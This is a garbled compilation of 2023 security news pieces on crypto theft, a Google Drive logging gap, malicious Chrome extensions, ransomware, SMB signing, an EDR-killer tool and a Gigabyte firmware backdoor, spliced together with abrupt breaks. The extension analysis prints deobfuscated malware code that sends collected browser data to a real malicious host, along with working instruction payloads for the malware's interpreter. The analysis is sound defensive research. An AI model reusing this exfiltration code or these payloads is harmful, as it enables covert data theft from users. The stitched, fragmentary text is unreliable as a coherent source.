BleepingComputer contacted Atomic Wallet with questions about the attack, but a response was not immediately available.

Atomic Wallet hacks lead to over $35 million in crypto stolen

Experts have uncovered a method for hackers to steal data from people’s Google Drive accounts without leaving any trace of the files they got away with.

Cybersecurity researchers from Mitiga Security have published findings claiming the problem lies in the fact that for users without a paid license for Google Workspace, nothing is logged and there are no records of any actions a user might make in their private drive.

That means should a threat actor compromise a cloud storage account, they could easily revoke their paid license, bringing the account back to the “Cloud Identity Free”, costless license, and thus turning off any logging or record-taking features. After that, they’d be able to exfiltrate any and all files without leaving a single trace. The only thing an admin would later see is that someone revoked a paid license.

Lacking controls

Mitiga says it notified Google of its findings, who is yet to respond.

Identifying which files were taken during a data breach is an essential part of any post-mortem or hacking forensics process. It helps the victims determine what type of data was taken, and thus conclude if there is any danger of potential identity theft, wire fraud, or similar.

Proper logging is also one of the standard ways for IT teams to keep track for potential incursions before they are able to cause any serious damage.

Source

Note: Even for the removed extensions, it isn’t “mission accomplished” yet. Yes, the extensions can no longer be installed. However, the existing installations remain. From what I can tell, Google didn’t blocklist these extensions yet.

Avast ran their own search, and they found a bunch of extensions that I didn’t see. So how come they missed eight extensions? The reason seems to be: these are considerably different. They migrated to Manifest V3, so they had to find new ways of running arbitrary code that wouldn’t attract unnecessary attention.

Update (2023-06-03): These extensions have been removed from the Chrome Web Store as well.

Contents
Which extensions is this about?
Is it even the same malware?
The “config” downloads
Executing the instructions
What is this being used for?

Which extensions is this about?

The malicious extensions currently still in Chrome Web Store are:

Is it even the same malware?

I found this latest variant of the malicious code thanks to Lukas Andersson who researched reputation manipulation in Chrome Web Store. He shared with me a list of extensions that manipulated reviews similarly to the extensions I already discovered. Some of these extensions in fact turned out malicious, with a bunch using malicious code that I didn’t see before.

But this isn’t evidence that all these extensions are in fact related. And the new variant even communicates with tryimv3srvsts[.]com instead of serasearchtop[.]com. So how can I be certain that it is the same malware?

The obfuscation approach gives it away however: lots of unnecessary conditional statements, useless variables and strings being pieced together.

It’s exactly the same thing as I described for the PDF Toolbox extension already. Also, there is this familiar mangled timestamp meant to prevent config downloads in the first 24 hours after installation. It merely moved: localStorage is no longer usable with Manifest V3, so the timestamp is being stored in storage.local.

The code once against masquerades as part of a legitimate library. This time, it has been added to the parser module of the Datejs library.

The “config” downloads

The approach to downloading the instructions changed considerably however. I’ll use Soundboost extension as my example, given that it is by far the most popular. When downloading the “config” file, Soundboost might also upload data. With obfuscation removed, the code looks roughly like this:

async function getConfig()
{
  let config = (await chrome.storage.local.get("<key>")).<key>;
  let options;
  if (config)
  {
    options = {
      method: "POST",
      body: JSON.stringify(config)
    };
  }
  else
  {
    config = {};
    options = {
      method: "GET"
    };
  }
  let response = await fetch(
    "https://tryimv3srvsts.com/chmfnmjfghjpdamlofhlonnnnokkpbao",
    options
  );
  let json = await response.json();
  Object.assign(config, json);
  if (config.l)
    chrome.storage.local.set({<key>: config});
  return config.l;
}

So the extension will retrieve the config from storage.local, send it to the server, merge it with the response and write it back to storage.local. But what’s the point of sending a config to the server that has been previously received from it?

I can see only one answer: by the time the config is sent to the server, additional data will be added to it. So this is a data collection and exfiltration mechanism: the instructions in config.l, when executed by the extension, will collect data and store it in the storage.local entry. And next time the extension starts up this data will be sent to the server.

This impression is further reinforced by the fact that the extension will reload itself every 12 hours. This makes sure that accumulated data will always be sent out after this time period, even if the user never closes their browser.

Executing the instructions

Previously, Chrome extensions could always run arbitrary JavaScript code as content scripts. As this is a major source of security vulnerabilities, Manifest V3 disallowed that. Now running dynamic code is only possible by relaxing default Content Security Policy restrictions. But that would raise suspicions, so malicious extensions would like to avoid it of course.

With sufficient determination, such restrictions can always be worked around however. For example, the Honey extension chose to ship an entire JavaScript interpreter with it. This allowed it to download and run JavaScript code without it being subject to the browser’s security mechanisms. The company was apparently so successful extracting data in this way that PayPal bought it for $4 billion.

A JavaScript interpreter is lots of code however. There are indications that the malicious code in Soundboost is being obfuscated manually, something that doesn’t work with large code quantities. So the instruction processing in Soundboost is a much smaller interpreter, one that supports only 8 possible actions. This minimalistic approach is sufficient to do considerable damage.

The interpreter works on arrays representing expressions, with the first array element indicating the type of the expression and the rest of them being used as parameters. Typically, these parameters will themselves be recursively resolved as expressions. Non-array expressions are left unchanged.

I tried out a bunch of instructions just to see that this approach is sufficient to abuse just about any extension privileges. The following instructions will print a message to console:

[
  // Call console.log
  "@", [".", ["console"], "log"],
  // Verbatim call parameter
  "hi"
]

The following calls chrome.tabs.update() to redirect the current browser tab to another page:

[
  // Call chrome.tabs.update
  "@", [".", [".", ["chrome"], "tabs"], "update"],
  // Verbatim call parameter
  {url: "https://example.com/"}
]

[
  // Call Reflect.apply
  "@", [".", ["Reflect"], "apply"],
  // target parameter: chrome.tabs.onUpdated.addListener
  [".", [".", [".", ["chrome"], "tabs"], "onUpdated"], "addListener"],
  // thisArgument parameter: chrome.tabs.onUpdated
  [".", [".", ["chrome"], "tabs"], "onUpdated"],
  // argumentsList parameter
  [
    // Call Array constructor
    "@", ["Array"],
    // Array element parameter
    [
      // Create closure
      "^",
      [
        // Call console.log
        "@", [".", ["console"], "log"],
        // Pass in function arguments received by the closure
        ["#"]
      ]
    ]
  ]
]

Trend Micro, which examined an x64 VMware ESXi version targeting Linux machines, said it identified an "extremely high degree of similarity" between Royal and BlackSuit.

"In fact, they're nearly identical, with 98% similarities in functions, 99.5% similarities in blocks, and 98.9% similarities in jumps based on BinDiff, a comparison tool for binary files," Trend Micro researchers noted.

A comparison of the Windows artifacts has identified 93.2% similarity in functions, 99.3% in basic blocks, and 98.4% in jumps based on BinDiff.

BlackSuit first came to light in early May 2023 when Palo Alto Networks Unit 42 drew attention to its ability to target both Windows and Linux hosts.

In line with other ransomware groups, it runs a double extortion scheme that steals and encrypts sensitive data in a compromised network in return for monetary compensation. Data associated with a single victim has been listed on its dark web leak site.

The latest findings from Trend Micro show that, both BlackSuit and Royal use OpenSSL's AES for encryption and utilize similar intermittent encryption techniques to speed up the encryption process.

The overlaps aside, BlackSuit incorporates additional command-line arguments and avoids a different list of files with specific extensions during enumeration and encryption.

"The emergence of BlackSuit ransomware (with its similarities to Royal) indicates that it is either a new variant developed by the same authors, a copycat using similar code, or an affiliate of the Royal ransomware gang that has implemented modifications to the original family," Trend Micro said.

Given that Royal is an offshoot of the erstwhile Conti team, it's also possible that "BlackSuit emerged from a splinter group within the original Royal ransomware gang," the cybersecurity company theorized.

The development once again underscores the constant state of flux in the ransomware ecosystem, even as new threat actors emerge to tweak existing tools and generate illicit profits.

This includes a new ransomware-as-a-service (RaaS) initiative codenamed NoEscape that Cyble said allows its operators and affiliates to take advantage of triple extortion methods to maximize the impact of a successful attack.

Triple extortion refers to a three-pronged approach wherein data exfiltration and encryption is coupled with distributed denial-of-service (DDoS) attacks against the targets in an attempt to disrupt their business and coerce them into paying the ransom.

The DDoS service, per Cyble, is available for an added $500,000 fee, with the operators imposing conditions that forbid affiliates from striking entities located in the Commonwealth of Independent States (CIS) countries.

Source

In a blog post, Microsoft Principal Program Manager Ned Pyle explained the reason for this move and also revealed that this change will be coming to more versions of Windows, along with Windows Server.

While versions of both Windows and Windows Server have supported SMB signing for quite a while, Microsoft has been making a lot of recent moves to make it a bigger part of Windows security.

In March 2022, Microsoft added the SMB authentication rate limiter to Insider builds. This rate limiter put in a 2-second timeout limit on each failed NTLM authentication attempt. That in theory should make it much harder for hackers to make multiple attempts to sign in.

In January 2023, Microsoft said that Windows 11 Pro will soon start disabling insecure SMB guest authentication fallbacks. Today, Pyle stated this new move to make SMB signing the default is "part of a campaign to improve the security of Windows and Windows Server for the modern landscape."

Pyle added:

Expect this default change for signing to come to Pro, Education, and other Windows editions over the next few months, as well as to Windows Server. Depending on how things go in Insiders, it will then start to appear in major releases.

In addition, we shouldn't expect this to be the end for SMB features in future versions of Windows, according to Pyle:

We'll continue to push out more secure SMB defaults and many new SMB security options in the coming years; I know they can be painful for application compatibility and Windows has a legacy of ensuring ease of use, but security cannot be left to chance.

It will be interesting to see how Microsoft's push of using SMB defaults will have an effect on truly making Windows safer to use in upcoming editions.

Microsoft says SMB signing by default is coming to more editions of Windows

The changelog for build 25381 is given below:

What’s new in Build 25381

SMB signing requirement changes

Beginning with Windows 11 Insider Preview Build 25381 Enterprise editions, SMB signing is now required by default for all connections. This changes legacy behavior, where Windows 10 and 11 required SMB signing by default only when connecting to shares named SYSVOL and NETLOGON and where Active Directory domain controllers required SMB signing when any client connected to them. This is part of a campaign to improve the security of Windows and Windows Server for the modern landscape.

All versions of Windows and Windows Server support SMB signing. But a third-party might disable or not support it. If you attempt to connect to a remote share on a third-party SMB server that that does not allow SMB signing, you may receive the one of following error messages:

• 0xc000a000
• -1073700864
• STATUS_INVALID_SIGNATURE
• The cryptographic signature is invalid.

To resolve this issue, configure your third-party SMB server to support SMB signing. This is Microsoft’s official recommended guidance. Do not disable SMB signing in Windows or use SMB1 to work around this behavior (SMB1 supports signing but does not enforce it). An SMB device that does not support signing allows interception and relay attacks from malicious parties.

SMB signing can reduce the performance of SMB copy operations. You can mitigate this with more physical CPU cores or virtual CPUs as well as newer, faster CPUs.

To see the current SMB signing settings, run the following PowerShell commands:

Get-SmbServerConfiguration | fl requiresecuritysignature

Get-SmbClientConfiguration | fl requiresecuritysignature

To disable the requirement for SMB signing in client (outbound to other device) connections, run the following PowerShell command as an elevated administrator:

Set-SmbClientConfiguration -RequireSecuritySignature $false

To disable the requirement for SMB signing in server (on Windows 11 Insider Preview Build 25381 and higher with Enterprise edition devices), run the following PowerShell command as an elevated administrator:

Set-SmbServerConfiguration -RequireSecuritySignature $false

No reboot is required but existing SMB connections will still use signing until they are closed.

For more information on this change, visit https://aka.ms/SMBSigningOBD.

Changes and Improvements

[General]

• If a camera streaming issue is detected such as a camera failing to start or a closed camera shutter, a pop-up dialog will appear with the recommendation to launch the automated Get Help troubleshooter to resolve the issue.

You can find the official blog post here.

Microsoft makes SMB signing mandatory with Windows 11 Canary build 25381

Numerous companies had data stolen after threat actors utilized a zero-day vulnerability in the MOVEit Transfer program to breach servers.

While extortion demands have not been sent to victims yet, and no one has claimed responsibility, this attack is similar to previous Clop ransomware attacks using GoAnywhere MFT and Accellion FTA zero-days to steal files.

Therefore, it would not be surprising to learn that Clop is behind the recent MOVEit attacks.

There have also been rumors for weeks that Royal ransomware was rebranding to a new ransomware operation called BlackSuit. This week, Trend Micro analyzed encryptors from both operations and said that they share very strong similarities with each other.

While this is not a strong enough link, the attack on Dallas may have put the Royal ransomware operation in the crosshairs, scaring them into a rebrand.

Finally, IBM released a report about BlackCat/ALPHV's new 'Sphynx' encryptor and other tools used by the operation that is a worthwhile read.

We also learned about some previous ransomware attacks, including @Seifreed, @billtoulas, @Ionut_Ilascu, @struppigel, @BleepinComputer, @serghei, @LawrenceAbrams, @malwrhunterteam, @demonslay335, @fwosar, @rapid7, @HuntressLabs, @GossiTheDog, @IBMSecurity, @TrendMicro, @Avast, @jgreigj, and @pcrisk.

May 29th 2023

MCNA Dental data breach impacts 8.9 million people after ransomware attack

Managed Care of North America (MCNA) Dental has published a data breach notification on its website, informing almost 9 million patients that their personal data were compromised.

May 30th 2023

BlackCat (ALPHV) Ransomware Levels Up for Stealth, Speed and Exfiltration

BlackCat ransomware, which was among the top ransomware families observed by IBM Security X-Force in 2022, according to the 2023 X-Force Threat Intelligence Index, continues to wreak havoc across organizations globally this year. BlackCat (a.k.a. ALPHV) ransomware affiliates’ more recent attacks include targeting organizations in the healthcare, government, education, manufacturing and hospitality sectors. Reportedly, several of these incidents resulted in the group’s publishing of sensitive data to their leak site including financial and medical information stolen from the victim organizations.

New STOP ransomware variants

PCrisk found new STOP ransomware variants that append the .weon or .werz extension.

New Dharma Variant

PCrisk found a new Dharma ransomware variant that appends the .xCor extension.

May 31st 2023

Investigating BlackSuit Ransomware’s Similarities to Royal

Royal ransomware, which is already one of the most notable ransomware families of 2022, has gained additional notoriety in early May 2023 after it was used to attack IT systems in Dallas, Texas. Around the same period, several researchers on Twitter came across a new ransomware family called BlackSuit that targeted both Windows and Linux users. Additional Twitter posts mentioned connections between BlackSuit and Royal, which piqued our interest. We managed to retrieve and analyze a Windows 32-bit sample of the ransomware from Twitter.

New STOP Variant

PCrisk found a new STOP ransomware variant that appends the .weqp extension.

June 1st 2023

New MOVEit Transfer zero-day mass-exploited in data theft attacks

Hackers are actively exploiting a zero-day vulnerability in the MOVEit Transfer file transfer software to steal data from organizations.

Harvard Pilgrim Health Care ransomware attack hits 2.5 million people

Harvard Pilgrim Health Care (HPHC) has disclosed that a ransomware attack it suffered in April 2023 impacted 2,550,922 people, with the threat actors also stealing their sensitive data from compromised systems.

June 2nd 2023

The rise and fall of ransomware: Insights from Avast's Q1/2023 Threat Report

Ransomware has been a prominent threat in cybersecurity for more than a decade, but the rates of incidents are showing slight decline. The Avast Q1/2023 Threat Report examines why.

Legal services platform used by SEC, Pentagon investigating ransomware attack claims

A legal document platform used by several arms of the U.S. government is investigating claims by a ransomware group that it has been attacked.

That's it for this week! Hope everyone has a nice weekend.

The Week in Ransomware - June 2nd 2023 - Whodunit?

Google’s Android and Chrome extensions are a very sad place. Here’s why

The author Spyboy, claims that this Terminator tool is able to successfully disable twenty-three EDR and anti-virus controls. These include products from Microsoft, Sophos, CrowdStrike, AVG, Avast, ESET, Kaspersky, Mcafee, BitDefender, Malwarebytes, and more. The software is being sold at US$300 (single bypass) to US$3,000 (all-in-one bypass).

CrowdStrike notes that the Terminator EDR evasion tool generates a legitimate, signed driver file Zemana Anti-Malware, that is being used to potentially exploit a security vulnerability tracked under ID "CVE-2021-31728". However, it does require elevated privileges and User Account Control (UAC) acceptance. Only Elastic detects the file as malicious whereas the file is undetected by 70 other vendors according to VirusTotal.

Harris says that the tool works in a way similar to how Bring Your Own Vulnerable Driver (BYOVD) disables security components present on the system:

At time of writing, the Terminator software requires administrative privileges and User Account Controls (UAC) acceptance to properly function. Once executed with the proper level of privilege, the binary will write a legitimate, signed driver file — Zemana Anti-Malware — to the C:\Windows\System32\drivers\ folder. The driver file is given a random name between 4 and 10 characters.

This technique is similar to other Bring Your Own Driver (BYOD) campaigns observed being used by threat actors over the past several years.

Under normal circumstances, the driver would be named zamguard64.sys or zam64.sys. The driver is signed by “Zemana Ltd.” and has the following thumbprint: 96A7749D856CB49DE32005BCDD8621F38E2B4C05.

Once written to disk, the software loads the driver and has been observed terminating the user-mode processes of AV and EDR software.

 

In a demo, the threat actor showed that CrowdStike Falcon EDR was successfully disabled with the help of Terminator. The image on the left (below) shows Falcon still running while the right image shows Falcon process was terminated.

You may find more technical details on Spyboy's Terminator EDR killer on Andrew Harris' post on Reddit (via Soufiane on Twitter).

Source

The implementation by Gigabyte is designed to download updates. Eclypsium explains that Gigabyte has embedded a Windows executable file in the motherboard's UEFI firmware. This file is written to disk as part of the boot process and loaded into memory.

Later on, it is loaded during Windows startup, contacts an Internet server operated by Gigabyte, to check for and download updates. The researchers discovered that one of the servers was still using HTTP and that the HTTPS implementation of the other servers was not validating remote server certificates correctly.

This allows third-parties to attack systems using Machine-in-the-middle attacks. Furthermore, the researchers note, there is no cryptographic digital signature verification or other validation in place regarding the firmware. While Gigabyte's executable that is embedded in the firmware and downloaded tools from the manufacturer are cryptographically signed, threat actors may nevertheless use the backdoor to attack systems and infect them with persistent malware.

Mitigations

Eclypsium published a list of affected motherboard models here. It is a PDF document that lists motherboards and revisions. Programs such as the free Speccy reveal the make and model of the motherboard, and you may also find out how much RAM the motherboard supports.

Windows includes options to look up the information without using third-party tools. Here is how that works:

1. Use Windows-X to open the admin menu.
2. Select Terminal.
3. Run the following command wmic baseboard get product,Manufacturer,version,serialnumber

The command returns the information required.

The researchers recommend that administrators disable the "App Center Download & Install" feature in the system's UEFI/BIOS. Doing so blocks the process, so that it can't be exploited. They also recommend setting BIOS passwords to protect the setting from manipulation by third-parties.

Other options include checking for firmware updates released recently by Gigabyte that address the issue, and to block the server addresses that Gigabyte's tool uses for its downloads.

The firmware of Gigabyte motherboards can still be updated manually. This requires downloading the latest version of the BIOS from Gigabyte's website and then using the company's BIOS flash tool to apply the update.

Closing Words

While the risk appears relatively low for Home systems, administrators of these systems may still want to make sure that the functionality is disabled in the BIOS. Organizations are the more likely target, and system administrators should also ensure that the functionality is turned off.

Installation of new firmware updates for Gigabyte motherboards, if released by the manufacturer, may address the vulnerability. Gigabyte has not published an official response and it is unclear if and when firmware updates will become available.

Source